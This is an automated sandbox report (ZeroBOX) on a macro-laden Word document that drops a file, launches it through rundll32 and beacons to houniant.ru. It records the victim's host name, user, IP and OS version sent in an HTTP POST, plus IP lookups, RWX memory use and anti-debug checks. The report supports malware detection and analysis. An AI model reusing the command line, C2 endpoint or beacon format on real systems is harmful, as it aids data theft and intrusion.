Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 23, 2021, 9:30 a.m.	Sept. 23, 2021, 9:32 a.m.

Size	328.0KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Template: Normal.dotm, Revision Number: 2, Create Time/Date: Wed Sep 22 10:47:00 2021, Last Saved Time/Date: Wed Sep 22 10:47:00 2021, Number of Pages: 1, Number of Words: 3, Number of Characters: 19, Security: 0
MD5	`93cf89d232b8e35b0de0b11d1b99f680`
SHA256	`e103d4d0fb6c386cb2b2f7ad187bdd352ba0774e8c64c6a61667d428d3577898`
CRC32	`B5FD0565`
ssdeep	`6144:9RVCgeFRmJMYjTkRFr8NWfli4+ulJv626Mpv0dFO/E:DV9iQsDr8NAlB+uTv626YV/`
Yara	Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries] Generic_Malware_Zero - Generic Malware Microsoft_Office_File_Zero - Microsoft Office File

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\0922_2541267277276.doc
2364
- rundll32.exe rundll32.exe c:\users\test22\appdata\roaming\microsoft\templates\flexx.xz,NEESKGAWLQK
  2728

Name	Response	Post-Analysis Lookup
houniant.ru	A 65.108.20.39	65.108.20.39
armerinin.com	A 65.108.20.39	65.108.20.39
api.ipify.org	A 54.235.247.117 CNAME nagano-19599.herokussl.com A 50.17.226.156 A 23.23.137.115 A 54.243.51.135 A 54.243.117.237 A 54.243.59.231 A 50.16.239.65 CNAME elb097307-934924932.us-east-1.elb.amazonaws.com A 23.21.173.155	50.19.104.221

IP Address	Status	Action
164.124.101.2	Active	Moloch
23.23.137.115	Active	Moloch
65.108.20.39	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49175 -> 23.23.137.115:80	2021997	ET POLICY External IP Lookup api.ipify.org	Device Retrieving External IP Address Detected

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA Sept. 23, 2021, 9:30 a.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 23, 2021, 9:30 a.m.			0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header

suspicious_request

POST http://houniant.ru/8/forum.php

Performs some HTTP requests (2 events)

request	GET http://api.ipify.org/
request	POST http://houniant.ru/8/forum.php

Sends data using the HTTP POST Method (1 event)

request

POST http://houniant.ru/8/forum.php

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

houniant.ru

description

Russian Federation domain TLD

Allocates read-write-execute memory (usually to unpack itself) (50 out of 84 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6a85d000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6a46e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03814000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03814000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03814000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03814000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03814000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03814000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aa7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x088c8000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x088c8000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x088c8000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x088c8000 process_handle: 0xffffffff	1

Looks up the external IP address (1 event)

domain

api.ipify.org

Creates (office) documents on the filesystem (2 events)

file	c:\Users\test22\AppData\Roaming\microsoft\templates\~$diplo.doc
file	C:\Users\test22\AppData\Local\Temp\~$22_2541267277276.doc

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\diplo.doc.LNK

Creates hidden or system file (2 events)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile Sept. 23, 2021, 9:30 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x000004a4 filepath: C:\Users\test22\AppData\Local\Temp\~$22_2541267277276.doc desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$22_2541267277276.doc create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0
NtCreateFile Sept. 23, 2021, 9:30 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x0000066c filepath: c:\Users\test22\AppData\Roaming\microsoft\templates\~$diplo.doc desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\c:\users\test22\appdata\roaming\microsoft\templates\~$diplo.doc create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\diplo.doc.LNK

Word document hooks document open

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 23, 2021, 9:30 a.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef70000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 23, 2021, 9:30 a.m.	flags: 0 family: 2	1	0	0

One or more non-whitelisted processes were created (1 event)

parent_process

winword.exe

martian_process

rundll32.exe c:\users\test22\appdata\roaming\microsoft\templates\flexx.xz,NEESKGAWLQK

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (2 events)

Time & API	Arguments	Status	Return	Repeated
HttpSendRequestA Sept. 23, 2021, 9:30 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: GUID=8962251904648732308&BUILD=2209_ubm&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)		0	0
HttpSendRequestA Sept. 23, 2021, 9:30 a.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: GUID=8962251904648732308&BUILD=2209_ubm&INFO=TEST22-PC @ test22-PC\test22&EXT=&IP=175.208.134.150&TYPE=1&WIN=6.1(x64)	1	1	0

The process winword.exe wrote an executable file to disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\flex.xz

Generates some ICMP traffic

0922_2541267277276.doc

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All